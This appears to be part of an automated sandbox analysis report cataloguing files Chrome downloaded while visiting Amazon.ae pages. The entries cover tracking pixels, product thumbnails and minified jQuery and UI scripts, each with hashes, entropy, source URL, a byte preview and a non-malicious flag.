                                                                                                                                                                                                                                                                Preview:{"verdict":1,"original_url":"https://specialpoint.net/","landing_url":"https://specialpoint.net/","features":["Has borderless iframe"],"cus_prefs":{"branding_logo":"iVBORw0KGgoAAAANSUhEUgAAAVgAAABACAYAAABfnm8CAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAALiMAAC4jAXilP3YAABzHSURBVHhe7Z0HmBzFlce1S+YMIotgjEgiZxtjjMkcyZyOHE0QRzyCAIE4MBYgskmSQCST4e4wQcKIw8gEE4+cgwCBwYgMEkggIUsC//7db/abmZ2ZrqruSUv/vu9tVfXUexW6t7q6urqq47vvvvtFr169focsi3QgrcQ3yAvILR0dHWOR76OjAVDO+XD2RrbFzlI69v3333fi/Iv8RSiNd5DTOjs7n4yO5OTk5IRAw/MJDU3LQz4fR1aybDuDqm4i+yGfx5bcIP4EnNnMTE5OTo436sHNH3tbG3qd6mk/RaO3UXwkGeJ2IBehex2ysB12RT1b1U9OTk5OEGqArsPdLw62PuT3U5zVeXz/LD5SHXqhB9Kw/sGCXpDONaRxoAWDIQ/H42j4JYTp5P94ZKaFGwb5XhJnU2RlZCHE52ZzMXX3pvlrQj3Pi2yMdx1kCWR2Ha/AW9i8yPxVwVZv5GwLthJTkcnIR8h45CXK8wVuEJwfdYzOiUMtxXfIFERlex95jev39Xpcw5xntV9r4t0QWQ4pH+5rNh/rRC2FTCajbQP5vcYKUBXiLIpMNBUv0JuELGamUoGdQWY2CPS3MVMNgfQ2QO5BZlkWvEDvZjNVE+IthgxHnK494l1mqjUh3iam0tKQT/ES3lNxl7HsO4PeppGhNoDyfYXcgmxPMPV7HmzMhq0DkNeiBFoU8jeKm2jnB+T59DjrbcO+ZH5
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26ctb%3D1%26m%3D1%26sc%3D6NXZ98JFWKRECR4538X7%26pc%3D25970%26at%3D25970%26t%3D1723469120419%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26ui%3D2%26lob%3D1:25971
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5618
                                                                                                                                                                                                                                                                Entropy (8bit):7.937103938750826
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:74aNeNu9xEgvzpbaknI2XelswS/kXcrpAIsV4PeQFE3DYcmY5M56zI++:+NoRvVOkI2XeeBkEts6WQCTZJ5xzl+
                                                                                                                                                                                                                                                                MD5:072CD502E6F76378C71338E4C5381111
                                                                                                                                                                                                                                                                SHA1:C92B3A72A3018B2DB2A08275C150F9B1C075FF38
                                                                                                                                                                                                                                                                SHA-256:EED115D8945646EFAB77BF5C100DDCB1126322B9E0996A77A8CFEC170516EAED
                                                                                                                                                                                                                                                                SHA-512:7533EE9CA62BC688BF8A5FAECD39FA400CC9115A43D6B27A36398BA05395258D1FAECC6099BCDC17A36E3ED92CB3F9237A72C63F0E5BE7C4E3216B96FE428168
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1740513_3911846_186x116_1X_en_AE._SY116_CB566464918_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..............................................................................#.......................................................................t...."................................................................!1..AQa."2q.....#Br...$b....C...%34DRS.................................................!1.A.2"Q.BRaq.............?..S..(..p>".Rf.I.F`..?QEV.j....x....A.....yg.Mi'...y.[.m....r[57.1a.+.2..r|.&..k.X..v.....W.v..rU..K..B........m."W.ep..M......umo.n,.~x.W<.o..t'..1.px....C.....3.j.Y..t....R.....o,....I..m=/ma..$vYs.Ku.I.ob.U\....eoDfj<Yy4.V...|Y.56~n.".e.Z... U...m...B..U.Cr...|...d^F........]...z....*,`.M...I...Q...W.Y.. 8........XO+..4Z.....&,...O...)i.....$..a.&.E.cV.0....+.......m....XA..w....37^t...j;....4..[.?.5w...6A.F.x....;........J..#.p.N....4\.ES.].....4+k..J.|.h..<...#.M.M.L...../.. .Z.I!...Tr.+-....n..:..%7.EA..G.-G.....#.(".di.T;\..U..w]}..o.w.MZy{..hfZ.2@./6....[.*.s-.7\R..1..)~$..j.d...d..q......j...c.2..u..V....+
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3859
                                                                                                                                                                                                                                                                Entropy (8bit):7.7580495385560475
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:n+Pp+uyDVBPeFZKiaSR2/RZzO4qyD0hM93:n0wdPDVR9qa0Kx
                                                                                                                                                                                                                                                                MD5:47E6362325B51AF9B9A01D855070810B
                                                                                                                                                                                                                                                                SHA1:09E631CD9343A5878566C2368DC7BE4E68E8132D
                                                                                                                                                                                                                                                                SHA-256:E3535F690F9EA1270D88D1DE7B4FCA4AB1D45B19E9241F100477EF32C4CF7651
                                                                                                                                                                                                                                                                SHA-512:41BC909BA4C104D2479B48406702A7A39283778977DFAF8402951BFB0AFD1827953FDC877F1D68F0AB019D188DF754E61994FF2E292BBD71B37C608702F09F21
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........6......................................................................7..............`...b.[w.L...J._]e..k.."..............*...6W..|..Nb...E...f\.dmx..0.......6....DZ..7`...j......4....eN.?k....f. .......-;/....../4./Z~..N.>.&K..Z.{JC...,!...Q........+Mi9..iOg.......XG.7.....w...... ...............U....N..v=....q1...O.................Y.............................%5E.!6Ua..&14@AVe....$7DFQTq..."0PWu........'8Gdtw................?......g..&[.R....9.Q!.. ....\a2...O....s......)75&.?...1s...[.d.5i/.t.2.#n{@cWIP.Y3.[..J.w(,.M.....msGq....2...X5z..k.W.!....!..0.<..8G..h.....D..Q$.2..0.U...5?TF[%5N<...2...\u..4.?J....C......N..S..I2I....n.4.S..C..M.#........&...J.Ri5...d..#....?DG.@.".....@..Kw...u.r.I.-.....p...-..K....c.0..n.+.)......jL.+...Oh..C.....Lc*\....u5...Z.o....C.e....w.`K..S=_
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2801
                                                                                                                                                                                                                                                                Entropy (8bit):7.790985704791464
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6g6Si4bbbbbT2ZOxbYQb76FkFnr7KSoa5vbhN87B6Ckbbfa5yhXjyFUR+v:To6d4bbbbbT2ZaEQb2yViDa5D8kx65yE
                                                                                                                                                                                                                                                                MD5:2DD96920AF6E1B185A6757753FC2F526
                                                                                                                                                                                                                                                                SHA1:F44A7534BB6BF100D53F32ABCA104CB68CB864D3
                                                                                                                                                                                                                                                                SHA-256:086EED81718DF4BCE1B909907E8B063BEAEC3921897BBFF9C60704293E3FD709
                                                                                                                                                                                                                                                                SHA-512:F40A2058EEDEB686FA63E367447EC542372CEB62D8AEF14C4FC33B3624E46688B547117083BAFC1C295FEDBB02216A447F8779E31E5B71B374008EE440FCD1C5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!....1AQq.2ars..."#3......$...%4BCRb..................................................1..!2..Aaq."4b..............?..q.....................................+..UW......W{.J*.'....2&.X........K..Q.I...S=...(.}..k......QJ.Z.z......6........:Wt....f.....#..`jx.[.+..bS......'...$..D....x.C.Z......u..ZE8..c.El.l$..g_...C3?.....p%&.....B.J.....J..(.-.OL.P.........J..qr.f ..*..6.S..vmX....gq..L.5....+.u7Z-...Q.'b6...pw^&.........J.....V/Y.k.Y..'z...`..*..=v......'.8:..F31eR..(......D.Y.Rf.}.....n.*.r..OIdD*f........l.....\1E.xQ,.....D.................=v...Z.l1(wZp.[Y..Kg@.m...b.Q}.O...4..v..v...q.*...........z..Vj..L.5;eI..j....Kiw+.rIKW..........*.MyY...nG=6...%.n=..q"...-[.P[...j. r...T.=.,k..3.VK.P.Z.....B..}.m..........1..VN..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Asi%26si%3D34810%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):14097
                                                                                                                                                                                                                                                                Entropy (8bit):5.396585029433089
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:ZQbYH9lS9MBzL1XLnFUPFHU5GPyL2yxFzDNc/RaeK7gf0TAs/YrUEiy62:WC+9TPtZyLnRDNc/RaeK7gf0TACEnJ
                                                                                                                                                                                                                                                                MD5:BA6237BE445A2B92328E7692A1A48D2C
                                                                                                                                                                                                                                                                SHA1:9E54BB7AB015D2DF78A496121D91F44D3CC20086
                                                                                                                                                                                                                                                                SHA-256:7B9916714AC75A08AC52548C1F7BCF5E195F1080DCBA47D1AADE2D0B73AE6F26
                                                                                                                                                                                                                                                                SHA-512:C0296C2AE5442CD763A2A04B01286B1C8546119A16E2998FB7D9418AE9A502DB0D6BCBF3CCB94180DF08807A2A9D00FF659DA9B1D365C76CF7D0F76A8ECE9531
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/31hhTM5DnfL.js?xcp
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistListsFrontEndCards__p13n-zg-list-carousel-desktop:p13n-zg-list-carousel-desktop__WjaljjYz","exports tslib @c/aui-carousel @c/scoped-dom @p/A @c/aui-untrusted-ajax @c/metrics @c/dom @c/remote-operations @p/a-carousel-framework @c/logger @c/browser-operations".split(" "),function(B,v,K,L,M,N,x,O,P,Q,R,S){function w(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}var C=w(K),r=w(L),f=w(M),D=w(N),T=w(P),U=w(Q),y=w(R),V=w(S),E={},z=function(a,c,b){void 0===c&&.(c="");void 0===b&&(b=1);c=a+c;E.hasOwnProperty(c)||(E[c]=!0,x.count(a,(x.count(a)||0)+b))},W=function(a){z(f["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var c=function(d,e){d={$event:{preventDefault:f["default"].$.noop,stopPropagation:f["default"].$.noop},$target:d.getContent().find('[data-a-tab-name="'+e+'"]'),data:{name:"energyEfficiencyTabSet"}};f["default"].trigger("a:declarative:a-tabs:click",d)},b=function(d,e){var k=d&&d.$e
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:JZJKZTDKNV2CKC82BW2M$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DJZJKZTDKNV2CKC82BW2M%26m%3D1%26sc%3Dcsa%3AbrowserQuiteFn%26pc%3D16604%26at%3D16604%26t%3D1723469060926%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-06%7CmutObsYes%7Cnavbar%7CgwCFImgNoCache%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Ccf_cdn_fr%7Ccf_cdn_mp%7CmutObsActive%7Caui%3Acss%3Anetwork%7Caui%3Ajs%3Acache%7CfourColumn%7CthreeColumnRevised%7CflexLayout%7CcssGridLayout%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%7Cadrender%3AGateway%3Aright-7%3Adesktop%7Cadrender%3Asafeframe%3Ab73e766d-3a78-4209-bde9-93efa566562d%7Cadrender%3Asafeframe%3AGateway%3Aright-7%3Adesktop%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Acreativetemplatename%3Aimage%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Acreativetemplatename%3Aimage%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Acreativeid%3A579371395698106697%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Acreativeid%3A579371395698106697%7Cadrender%3Ab73e766d-3a78-4209-bde9-93efa566562d%3Aprogramid%3A1001%7Cadrender%3AGateway%3Aright-7%3Adesktop%3Aprogramid%3A1001%7Ccsm-feature-touch-enabled%3Afalse%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%7CbrowserQuiteFn%26viz%3Dvisible%3A11%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DJZJKZTDKNV2CKC82BW2M%26aftb%3D1%26lob%3D1:16604
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (570)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):61068
                                                                                                                                                                                                                                                                Entropy (8bit):5.273369773505074
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:Alc/7w2HtMrXwhCkOLaZwVXCIIo3s7mtgEoW9GVFChA33:AqFarXxC3oTgbWZA
                                                                                                                                                                                                                                                                MD5:55CAB1E940F4E8F9CA3B895895CB57E2
                                                                                                                                                                                                                                                                SHA1:891873B8214ABA3F7FB8A306D3D586807AB9006B
                                                                                                                                                                                                                                                                SHA-256:E30998F16CB81E026CE4A6ABD872A0939BC89376785B7415AA115167087A3521
                                                                                                                                                                                                                                                                SHA-512:3BEFFD01CC8AED079E8AE1A7DDEA09FCC776E408F960BD7CF582D740396CEB919467133F57068DF0B70E0CCD2A06CB1440CBE21516D44701FCBC9129E0E6157B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(q){var x=window.AmazonUIPageJS||window.P,F=x._namespace||x.attributeErrors,A=F?F("QuantitySelectorAssets",""):x;A.guardFatal?A.guardFatal(q)(A,window):A.execute(function(){q(A,window)})})(function(q,x,F){function A(n){var f=!1;q.now(n).execute("qsAssetDuplicationGuard",function(a){f=!!a});return f}function L(n,f){if(!A(n))try{q.register(n,f)}catch(a){if(!a.message.includes("reregistered by QuantitySelectorAssets"))throw a;}}function Da(){var n=arguments;return{register:function(f,a){if(!A(f))try{q.when.apply(q,.n).register(f,a)}catch(c){if(!c.message.includes("reregistered by QuantitySelectorAssets"))throw c;}},execute:function(f,a){q.when.apply(q,n).execute(f,a)}}}L("QSAssetDuplicationGuard",function(){return{register:L,when:Da}});"use strict";q.when("QSAssetDuplicationGuard").execute("qsAUIDeps-main-duplication-guard",function(n){n.when("A","QuantitySelectorConstants","a-util").execute("qsAUIDeps-main",function(f,a,c){function h(){w&&w.enableCheckoutCompatibility&&g()}funct
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 143x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9699
                                                                                                                                                                                                                                                                Entropy (8bit):7.962750622414819
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:R4PLs+6bOkGuVlnIQYlRJJ6ZGV4aZAjnLlbyU+jq7TeOdq:RkvtgIjfjuCGRbyUYSKT
                                                                                                                                                                                                                                                                MD5:77BCD3C3FF13D691029B7A51EB6E52EA
                                                                                                                                                                                                                                                                SHA1:3D6F1C9163EB8DB211FAD0131F1B61F7CE7EBC7B
                                                                                                                                                                                                                                                                SHA-256:13CFDCACF505960DF364E8EA6C2A8A4A63C68D1B3545AE06BC48CB7FBDB54D52
                                                                                                                                                                                                                                                                SHA-512:177B92523A9CF7A389FA25AD67C98E488FA690381D7887831E26771E9801DDB21960A162EB8554058027B17776734AAEF673006241702926C5848233F17D286A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.1A."Q.2Tq....as......#4BRSbr...$3...5Cc.t...................................................!1..Q...2Aa.."Rq.....#Bb....$..34..............?.e..U...us*.L.TL.T. ./`.#?.f>.?........Y...*..."qP.h.6....D.h;...?..l..../........V.9.w..Q.....<C^..]0'..;....J...k..P.....).rX+i..6..2F...(.n.Q....?..T.5...J..h.g].5Y....A......9..;J..D..S].\...L..M...,Z.a~W...d..x.z......._.\KQ.P.j..Ld..A*E..M.......O{.d.\l......peq<7jX..w..)..#.......[lr.(..".p.p'....c.U..........A...]>......[.SR.S.".H..%.......W..u+u$.,....&y..i2.i.Jh....<.+:....l.{.Z.`...[.\C.......z...9.........Z.j......o..~qET...N.5$.....x...XZ Z3......l,.n$.f...4......2(....Y4..U.o.e...2.......F.N..8...j......|!.U.J.....n..~6..ii...wy.E0IOx..]}.{.&.....7.1..<....Q4j...M.F..<......c..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5427
                                                                                                                                                                                                                                                                Entropy (8bit):7.8492577240864
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:9Fg5aG09NSc+f8nYYF76Ge55qbQHmxhQHA90EeCRAYO2iamwVH2YTLzRT+TI2/ex:9FgEEc+f8xV6Ge5MkGxqtEeCROZ1wVfb
                                                                                                                                                                                                                                                                MD5:A84A5BCB2242983B0638541600BBFA37
                                                                                                                                                                                                                                                                SHA1:37ACEA3B1A43937A8A980FBD824695C75FB13289
                                                                                                                                                                                                                                                                SHA-256:7785D4012F96E2BD15FBEF1241B59574B541EC348426AEC92CF965F23ED90C3E
                                                                                                                                                                                                                                                                SHA-512:91D2F8D8923F3C697F9DE2C4A50F6ECBFFB0F950B306A20B3CDF130FCF9D1232A836DF1C99CD69F6DD1A4FC46C1A6AE7651BE7BEEF18A65B6C8AA12487E0DB82
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........9..............................................................................p......8..<...wYj..a..CAu.........bYk%...P....d.<.E..wg......m..z)]..m.k...*NY..9.#....Co5..j...$...../..;lg..p..^Q....Ju.S..U2.*....d.wM5.oh.Be...4CZ...O..Nr......?2li:W...n.....K...C...W6.e..x.....d........Q...g'..}...W..........'.#=...c......~,.1.[^.>..-.....|;m.M..K.mtSp....0...H...q.1..J.M..X.....g..9?'g>FW...............Y...............................!%5.&14Ua..$0AEeq.."'6FQTu..... @BDGdv...7Pf....................?....n....f9.)...$V....b.b......)..........p;.......:....`q.m..fy42...\8!.<..k..xi....[.r.6..c..{*."....{._/.69B.......;...f.M..................eJb..W............t........s1#..Ep.........3#...5.........4.U.C...e.H...e<]..A.u..0>...b..?.X.....'...r.?...).;.....S...:jv|%yzM.\....K.N.DXv.*.3
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (562)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):93236
                                                                                                                                                                                                                                                                Entropy (8bit):5.397125859693619
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:eEIiqW8dnB13P6Av59IWb7lIdGd0NQ1X0L7SjR9dgl/aaRZfLRnChZhpHju90u13:xYcQZMuZ7q9P1+pKbaM
                                                                                                                                                                                                                                                                MD5:7DBD0AF1B1B4C7BE16180F86EF947E6B
                                                                                                                                                                                                                                                                SHA1:A4332F3C2B25B2294A446EE8F9A7CAAE8236201A
                                                                                                                                                                                                                                                                SHA-256:30711CA94E9E52400EC9262D2948EC5CD91230C43EFE4E414A39682ED4782F99
                                                                                                                                                                                                                                                                SHA-512:EA05B2825411E1ADE46877378F01186813B4DC07A8F1E787D51A37CE977D4A0776A46AC49CD4FFE0BA22D2010E104D53397649D097A1FDD369E626F06B2701AC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61xJcNKKLXL.js?AUIClients/AmazonUIjQuery
                                                                                                                                                                                                                                                                Preview:/*. jQuery JavaScript Library v1.6.4. http://jquery.com/.. Copyright 2011, John Resig. Dual licensed under the MIT or GPL Version 2 licenses.. http://jquery.org/license.. Includes Sizzle.js. http://sizzlejs.com/. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses... Amazon elects to use jQuery and Sizzle under the MIT license... Date: Mon Sep 12 18:54:48 2011 -0400. Sizzle CSS Selector Engine. Copyright 2011, The Dojo Foundation. Released under the MIT, BSD, and GPL Licenses.. More information: http://sizzlejs.com/.*/.(function(H){var r=window.AmazonUIPageJS||window.P,p=r._namespace||r.attributeErrors,J=p?p("AmazonUIjQuery","AmazonUI"):r;J.guardFatal?J.guardFatal(H)(J,window):J.execute(function(){H(J,window)})})(function(H,r,p){r.navigator&&r.navigator.userAgent&&H.declare("jQuery",function(){function J(a,b,d){if(d===p&&1===a.nodeType)if(d="data-"+b.replace(gb,"-$1").toLowerCase(),d=a.getAttribute(d),"string"===typeof d){try{d="true"===d?!0:"false"===
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):27601
                                                                                                                                                                                                                                                                Entropy (8bit):7.9517577127448265
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:+wj59CGgQMzh2oQxOKp78I2KVgbhJXVrTfTWzytXEq:UGgxtRQxz78I92PXVTWzytXEq
                                                                                                                                                                                                                                                                MD5:388086542826E710B71AC12D48A30937
                                                                                                                                                                                                                                                                SHA1:0578983DF102DB1AE9346A83AB05B55E50D535BD
                                                                                                                                                                                                                                                                SHA-256:74FD2485B3739828D6DCCD9EB29DC3F2E7C1AEF96E18EC6D8433A20F11DD987B
                                                                                                                                                                                                                                                                SHA-512:1D0806D5DCFC5B11294A08FF0F4B34852D02164C218CEF09886A0E711407AD5381F2CB2E2AE1E3F4571D76F79A2F2F1C038A70BCDFF33EAAABD5F6ACB12314AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/51Q42KWVMgL._SR480,440_.jpg"
